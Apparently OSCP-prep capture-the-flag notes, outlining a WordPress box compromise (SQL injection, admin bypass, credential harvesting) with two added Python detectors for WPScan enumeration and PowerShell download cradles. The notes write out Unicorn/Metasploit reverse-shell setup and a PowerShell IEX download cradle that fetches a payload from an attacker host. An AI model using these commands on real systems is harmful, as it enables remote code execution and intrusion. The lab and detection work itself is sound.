- Nmap
- SSL enum -> add hostnames to /etc/hosts
- WPScan -> authenticated SQL injection
- WPScan enumerate users
- Searchsploit -> unauthenticated admin access
- Use exploit HTML, edit URLs and exploit the vuln
- Login as admin
- Find user SMTP password in plugin
- Set up SMTP client and read emails
- Credentials to forum in emails
- Find encrypted forum entries
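From the defender's side, the WPScan user-enumeration step above leaves a recognisable trail in the web server access log: a burst of /?author=N requests with incrementing IDs, hits on the /wp-json/wp/v2/users REST endpoint, and (unless the operator changed it) a "WPScan" User-Agent. The following Python script is an added example written for these notes, not code from the original write-up; it parses a handful of constructed Apache combined-format log lines (the IPs, timestamps and version string are made up) and flags source addresses showing those patterns. The threshold of three distinct author IDs is an assumption you would tune for your own site.

```python
import re
from collections import defaultdict
from typing import Dict, Optional
from urllib.parse import parse_qs, urlsplit

# Apache "combined" log format: ip ident user [ts] "METHOD path proto" status size "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Constructed sample log lines for this example (not real traffic from the write-up).
SAMPLE_LOG = """\
10.10.14.5 - - [12/Mar/2021:10:00:01 +0000] "GET /?author=1 HTTP/1.1" 301 0 "-" "WPScan v3.8.7 (https://wpscan.org/)"
10.10.14.5 - - [12/Mar/2021:10:00:01 +0000] "GET /?author=2 HTTP/1.1" 301 0 "-" "WPScan v3.8.7 (https://wpscan.org/)"
10.10.14.5 - - [12/Mar/2021:10:00:02 +0000] "GET /?author=3 HTTP/1.1" 404 1520 "-" "WPScan v3.8.7 (https://wpscan.org/)"
10.10.14.5 - - [12/Mar/2021:10:00:02 +0000] "GET /wp-json/wp/v2/users HTTP/1.1" 200 812 "-" "WPScan v3.8.7 (https://wpscan.org/)"
192.168.1.20 - - [12/Mar/2021:10:01:00 +0000] "GET /?author=1 HTTP/1.1" 301 0 "-" "Mozilla/5.0"
192.168.1.20 - - [12/Mar/2021:10:01:05 +0000] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
"""


def parse_line(line: str) -> Optional[dict]:
    """Split one combined-format line into named fields; None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def analyze(log_text: str, author_threshold: int = 3) -> Dict[str, dict]:
    """Return, per source IP, the user-enumeration indicators seen (only IPs with at least one flag)."""
    per_ip = defaultdict(lambda: {"author_ids": set(), "rest_users": 0,
                                  "scanner_ua": False, "requests": 0})
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        state = per_ip[rec["ip"]]
        state["requests"] += 1
        parts = urlsplit(rec["path"])
        # /?author=N redirects to /author/<slug>/ and so discloses the login name
        author_values = parse_qs(parts.query).get("author")
        if author_values:
            state["author_ids"].update(author_values)
        # the REST users endpoint lists authors as JSON
        if parts.path.rstrip("/").endswith("/wp-json/wp/v2/users"):
            state["rest_users"] += 1
        # default WPScan User-Agent (trivially changed by an operator, so only a weak signal)
        if "wpscan" in rec["ua"].lower():
            state["scanner_ua"] = True

    report: Dict[str, dict] = {}
    for ip, state in per_ip.items():
        flags = []
        if len(state["author_ids"]) >= author_threshold:
            flags.append("author-enumeration")
        if state["rest_users"]:
            flags.append("rest-user-listing")
        if state["scanner_ua"]:
            flags.append("scanner-user-agent")
        if flags:
            report[ip] = {"requests": state["requests"],
                          "author_ids": sorted(state["author_ids"]),
                          "flags": flags}
    return report


if __name__ == "__main__":
    for ip, summary in analyze(SAMPLE_LOG).items():
        print(ip, summary)
```

The single /?author=1 request from 192.168.1.20 stays below the threshold and is not reported, which is the point of counting distinct IDs per source rather than alerting on any one request. The same counters translate directly into a SIEM rule, and the mitigations they point at are the usual ones: disable the author-ID redirect and restrict the REST users route to authenticated callers.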
Takeaways
- Check the SSL certificate information in the browser, e.g. for email addresses, and add hostnames to /etc/hosts
- Use a Burp Suite redirect proxy set on 127.0.0.1 to point to the remote host
- Use devtools to uncover censored passwords.
Takeaways:
Use Unicorn to upgrade shells:
unicorn windows/meterpreter/reverse_tcp $local_ip $local_port
This generates one .rc file for Metasploit and one PowerShell script.
Start Metasploit with the generated resource file:
msfconsole -r unicorn.rc
Cut the PowerShell payload down to only the part in double quotes and save it as shell.html.
Start a local web server to serve the file:
python -m http.server 80
Execute in the Windows console:
powershell "IEX(New-Object Net.WebClient).downloadString('http://$IP/shell.html')"
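The one-liner above is a classic PowerShell download cradle, and it is exactly the shape that endpoint detection looks for in process-creation telemetry (Sysmon Event ID 1 or Windows 4688 with command-line logging). The script below is an added example for these notes, not part of the original write-up: it runs over a few constructed process-creation records (host names, image names and the 10.10.14.5 URL are made up), flags command lines that pair an Invoke-Expression with a web fetch, and decodes an -EncodedCommand payload first so that base64 wrapping does not hide the same cradle. The rule names and the record layout are assumptions for this example.

```python
import base64
import re
from typing import Dict, List

# Invoke-Expression (or its IEX alias) combined with a fetch primitive is the cradle signature
CRADLE_INVOKE = re.compile(r"\b(?:IEX|Invoke-Expression)\b", re.IGNORECASE)
CRADLE_FETCH = re.compile(
    r"(?:Net\.WebClient|DownloadString|DownloadFile|Invoke-WebRequest|Invoke-RestMethod)",
    re.IGNORECASE,
)
# -e / -ec / -enc / -EncodedCommand followed by a base64 blob (UTF-16LE script)
ENCODED_FLAG = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)
URL_RE = re.compile(r"https?://[^\s'\")]+")

# Constructed: the same cradle as above, but base64-wrapped the way -EncodedCommand expects
ENCODED_PAYLOAD = base64.b64encode(
    "IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.5/a.ps1')".encode("utf-16le")
).decode("ascii")

# Constructed sample process-creation events (command lines as an EDR/Sysmon would log them)
SAMPLE_EVENTS = [
    {"host": "WS01", "image": "powershell.exe",
     "cmd": 'powershell "IEX(New-Object Net.WebClient).downloadString(\'http://10.10.14.5/shell.html\')"'},
    {"host": "WS01", "image": "powershell.exe",
     "cmd": "powershell -NoProfile -Command Get-Process"},
    {"host": "SRV02", "image": "powershell.exe",
     "cmd": "powershell -enc " + ENCODED_PAYLOAD},
    {"host": "WS03", "image": "cmd.exe",
     "cmd": "cmd /c echo hello"},
]


def decode_encoded_command(cmd: str) -> str:
    """Append the decoded -EncodedCommand script to the command line, if one is present and valid."""
    m = ENCODED_FLAG.search(cmd)
    if not m:
        return cmd
    try:
        decoded = base64.b64decode(m.group(1)).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return cmd
    return cmd + " [decoded: " + decoded + "]"


def classify(cmd: str) -> Dict[str, List[str]]:
    """Return the detection names that fire on one command line plus any URLs worth triaging."""
    text = decode_encoded_command(cmd)
    findings: List[str] = []
    if CRADLE_INVOKE.search(text) and CRADLE_FETCH.search(text):
        findings.append("download-cradle")
    if ENCODED_FLAG.search(cmd):
        findings.append("encoded-command")
    return {"findings": findings, "urls": URL_RE.findall(text)}


def scan_events(events: List[dict]) -> List[dict]:
    """Run classify() over process-creation records and keep only those with at least one finding."""
    hits = []
    for ev in events:
        result = classify(ev["cmd"])
        if result["findings"]:
            hits.append({"host": ev["host"], "image": ev["image"], **result})
    return hits


if __name__ == "__main__":
    for hit in scan_events(SAMPLE_EVENTS):
        print(hit)
```

The extracted URL is what an analyst pivots on next (proxy logs, DNS, other hosts fetching the same path), and the encoded-command finding alone is worth a look even when no cradle is recognised, since legitimate administration rarely needs it. Script Block Logging (Event ID 4104) gives the same visibility after the fact for cradles that are obfuscated beyond what a regex catches.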
Thank you for your work which is making the oscp preparation an awesome experience.